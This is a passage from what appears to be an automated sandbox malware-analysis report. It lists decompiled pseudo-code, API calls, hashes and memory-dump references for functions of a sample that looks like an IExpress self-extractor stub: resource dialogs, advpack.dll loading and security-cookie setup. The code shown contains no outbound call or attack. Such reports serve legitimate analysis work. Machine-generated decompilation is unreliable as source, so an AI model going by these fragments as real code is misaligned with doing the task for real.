                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                            • String ID: 3$cent
                                                                                                                                                                                                                                            • API String ID: 2519184315-3438608206
                                                                                                                                                                                                                                            • Opcode ID: 804bac39fda06825ed402a6b055cf84ff268488e32420b2e4d031df9c5a149de
                                                                                                                                                                                                                                            • Instruction ID: ce740d481c11cfb5f04d1e5a62f6a5d2f0e766c228c91a64e5a7b3fba3351121
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 804bac39fda06825ed402a6b055cf84ff268488e32420b2e4d031df9c5a149de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1591F371A012349BEB378B18EC81BEA77B5EB45704F1640A9D8899B281DB788F81CF41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                                            			E00326517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0x329a3c; // 0x320000
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E003244B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t5 =  &_a16; // 0x322ee8
                                                                                                                                                                                                                                            					_t24 =  *_t5;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x0032651f
                                                                                                                                                                                                                                            0x0032652a
                                                                                                                                                                                                                                            0x00326534
                                                                                                                                                                                                                                            0x0032656b
                                                                                                                                                                                                                                            0x00326577
                                                                                                                                                                                                                                            0x0032657c
                                                                                                                                                                                                                                            0x0032657c
                                                                                                                                                                                                                                            0x00326536
                                                                                                                                                                                                                                            0x0032653e
                                                                                                                                                                                                                                            0x00326542
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326544
                                                                                                                                                                                                                                            0x00326547
                                                                                                                                                                                                                                            0x0032654c
                                                                                                                                                                                                                                            0x00326549
                                                                                                                                                                                                                                            0x00326549
                                                                                                                                                                                                                                            0x00326549
                                                                                                                                                                                                                                            0x0032655e
                                                                                                                                                                                                                                            0x00326560
                                                                                                                                                                                                                                            0x00326569
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326569
                                                                                                                                                                                                                                            0x00326542
                                                                                                                                                                                                                                            0x00326587

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00320000,000007D6,00000005), ref: 0032652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00320000,00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00326538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(00320000,00000000,00000547,003219E0,00000000), ref: 00326557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00326560
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID: .2
                                                                                                                                                                                                                                            • API String ID: 1214682469-669109296
                                                                                                                                                                                                                                            • Opcode ID: 25fe15f9ffca4af56298fa849be823b2e3ed5ff1a0e14a3bc4ce671ea1c95c05
                                                                                                                                                                                                                                            • Instruction ID: 0e3411b6b0a325104d7519cc2af0fc62c922bffd0faabe9710cc8276ff9b007f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25fe15f9ffca4af56298fa849be823b2e3ed5ff1a0e14a3bc4ce671ea1c95c05
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5012672100A25BBCB225F69AC09DBB7A6CEF8A360F110129FE0093150D7719C1186A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                            			E00326495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed char _t14;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                                                                            				_t18 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				E00321781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            				_t26 = "advpack.dll";
                                                                                                                                                                                                                                            				E0032658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                            				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x00326495
                                                                                                                                                                                                                                            0x00326495
                                                                                                                                                                                                                                            0x003264a0
                                                                                                                                                                                                                                            0x003264a7
                                                                                                                                                                                                                                            0x003264ab
                                                                                                                                                                                                                                            0x003264bd
                                                                                                                                                                                                                                            0x003264c2
                                                                                                                                                                                                                                            0x003264d3
                                                                                                                                                                                                                                            0x003264df
                                                                                                                                                                                                                                            0x003264e8
                                                                                                                                                                                                                                            0x00326502
                                                                                                                                                                                                                                            0x003264ee
                                                                                                                                                                                                                                            0x003264f9
                                                                                                                                                                                                                                            0x003264f9
                                                                                                                                                                                                                                            0x00326516

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003264DF
                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003264F9
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00326502
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                                                            • API String ID: 438848745-3761280616
                                                                                                                                                                                                                                            • Opcode ID: ebbb49ba366c9886e9c0368fa11e9142bcd18b9f3f6022974e16302b9692f884
                                                                                                                                                                                                                                            • Instruction ID: 243c1bb9b6107dbcb644de1ef56ab676d9b3092eaf3b7bcc652b7895aea438e0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebbb49ba366c9886e9c0368fa11e9142bcd18b9f3f6022974e16302b9692f884
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D101F930500118ABD721DB64FC46FEE737CDF65311F500199F585961C0DF70AE86CA51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E00324169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E0032468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E0032468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E003244B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E003244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x0032417d
                                                                                                                                                                                                                                            0x0032418f
                                                                                                                                                                                                                                            0x00324193
                                                                                                                                                                                                                                            0x003241b7
                                                                                                                                                                                                                                            0x003241d3
                                                                                                                                                                                                                                            0x003241e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003241e7
                                                                                                                                                                                                                                            0x003241d5
                                                                                                                                                                                                                                            0x003241d6
                                                                                                                                                                                                                                            0x003241d8
                                                                                                                                                                                                                                            0x003241d9
                                                                                                                                                                                                                                            0x003241da
                                                                                                                                                                                                                                            0x003241df
                                                                                                                                                                                                                                            0x003241e1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003241e1
                                                                                                                                                                                                                                            0x003241b9
                                                                                                                                                                                                                                            0x003241ba
                                                                                                                                                                                                                                            0x003241bc
                                                                                                                                                                                                                                            0x003241bd
                                                                                                                                                                                                                                            0x003241be
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003241be
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003230B4), ref: 00324189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003230B4), ref: 003241E7
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: a705c535846d0a3d95b2d30c8f1bfd461f2464f76476371322fcc5f7066c529b
                                                                                                                                                                                                                                            • Instruction ID: c9f7307b7114845430b630e09c46d3829508237e581851f8850018f1da209558
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a705c535846d0a3d95b2d30c8f1bfd461f2464f76476371322fcc5f7066c529b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5501F4B57006347FF32726667C86F7B218EDBD4795F014039B706E5180DA68EC1141B5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00327155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0x328004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x328004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0x328008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x0032715d
                                                                                                                                                                                                                                            0x00327161
                                                                                                                                                                                                                                            0x00327165
                                                                                                                                                                                                                                            0x00327178
                                                                                                                                                                                                                                            0x00327182
                                                                                                                                                                                                                                            0x0032718e
                                                                                                                                                                                                                                            0x00327197
                                                                                                                                                                                                                                            0x003271a0
                                                                                                                                                                                                                                            0x003271b1
                                                                                                                                                                                                                                            0x003271b8
                                                                                                                                                                                                                                            0x003271c4
                                                                                                                                                                                                                                            0x003271c7
                                                                                                                                                                                                                                            0x003271cb
                                                                                                                                                                                                                                            0x003271d5
                                                                                                                                                                                                                                            0x003271da
                                                                                                                                                                                                                                            0x003271da
                                                                                                                                                                                                                                            0x003271dc
                                                                                                                                                                                                                                            0x003271dc
                                                                                                                                                                                                                                            0x003271e2
                                                                                                                                                                                                                                            0x003271e5
                                                                                                                                                                                                                                            0x003271ee

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00327182
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00327191
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0032719A
                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 003271A3
                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 003271B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                            • Opcode ID: 424e94de489e1e75c748a0c59e235dcd3f62552aaa58229110f055aebbeb9bd8
                                                                                                                                                                                                                                            • Instruction ID: 8cdb5960195fcce4ef18d48a3eb8b42db40bf583138551cd2c4c4ba9cab03c53
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 424e94de489e1e75c748a0c59e235dcd3f62552aaa58229110f055aebbeb9bd8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A112171D05618EFCB21DFB8EA4869EB7F8FF48315F518459D405D7210DB30AA158B41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E003219E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                            					E003243D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x329a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x003219e0
                                                                                                                                                                                                                                            0x003219e0
                                                                                                                                                                                                                                            0x003219eb
                                                                                                                                                                                                                                            0x003219f2
                                                                                                                                                                                                                                            0x003219f9
                                                                                                                                                                                                                                            0x003219fc
                                                                                                                                                                                                                                            0x00321a01
                                                                                                                                                                                                                                            0x00321a2a
                                                                                                                                                                                                                                            0x00321a2e
                                                                                                                                                                                                                                            0x00321a3e
                                                                                                                                                                                                                                            0x00321a4f
                                                                                                                                                                                                                                            0x00321a62
                                                                                                                                                                                                                                            0x00321a6a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321a03
                                                                                                                                                                                                                                            0x00321a06
                                                                                                                                                                                                                                            0x00321a20
                                                                                                                                                                                                                                            0x00321a20
                                                                                                                                                                                                                                            0x00321a08
                                                                                                                                                                                                                                            0x00321a08
                                                                                                                                                                                                                                            0x00321a14
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321a16
                                                                                                                                                                                                                                            0x00321a18
                                                                                                                                                                                                                                            0x00321a70
                                                                                                                                                                                                                                            0x00321a72
                                                                                                                                                                                                                                            0x00321a72
                                                                                                                                                                                                                                            0x00321a14
                                                                                                                                                                                                                                            0x00321a06
                                                                                                                                                                                                                                            0x00321a81

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00321A18
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00321A24
                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 00321A4F
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00321A62
                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 00321A6A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                            • Opcode ID: 51a069816852b29fcd52c5e872cfbf52d9f87d078958e54b1f377d885221b0da
                                                                                                                                                                                                                                            • Instruction ID: 8a643f3f42c82484ef2169c328ee180ee7d60e82c737fed2eae9598b1de8407e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51a069816852b29fcd52c5e872cfbf52d9f87d078958e54b1f377d885221b0da
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB11C431501529AFDB22EF64EE09AAE77BCEF59310F108159F912D7190DA30AE22CB95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                            			E003263C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				long _v272;
                                                                                                                                                                                                                                            				void* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 =  *0x328004; // 0x2c4b51c8
